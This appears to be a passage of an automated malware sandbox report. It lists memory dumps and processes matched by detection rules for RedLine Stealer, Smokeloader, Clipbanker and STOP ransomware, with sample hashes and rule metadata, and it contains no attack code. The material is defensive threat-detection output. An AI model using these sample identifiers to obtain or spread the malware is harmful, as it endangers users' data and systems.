                Source: 00000019.00000002.473949878.0000000002434000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000026.00000002.508616217.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000026.00000002.506871844.00000000007F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000001E.00000000.474017727.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: 0000001E.00000000.474017727.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 0000001C.00000002.488812684.000000000228A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.380129580.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000012.00000002.451349547.00000000023B3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000004.00000002.445989950.0000000000738000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000028.00000002.618179009.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: 00000028.00000002.618179009.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 0000001E.00000002.477600932.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: 0000001E.00000002.477600932.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 00000007.00000002.460214856.0000000000838000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000004.00000002.445573902.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000001E.00000002.477942290.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: 0000001E.00000002.477942290.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 00000004.00000002.445509996.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000028.00000000.480111248.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: 00000028.00000000.480111248.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 00000004.00000002.446406704.00000000022D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000D.00000002.450548636.0000000002490000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000022.00000002.483526399.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000001B.00000002.490286812.0000000002380000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000018.00000002.478487593.00000000008C8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000002.380107918.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000005.00000002.442702951.00000000024A5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000022.00000002.482578416.0000000000887000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: D804.exe PID: 2560, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: D804.exe PID: 772, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: D804.exe PID: 1340, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: D804.exe PID: 6088, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: D804.exe PID: 128, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: D804.exe PID: 4528, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: B46F.exe PID: 4928, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: B46F.exe PID: 2576, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: A170.exe PID: 1868, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
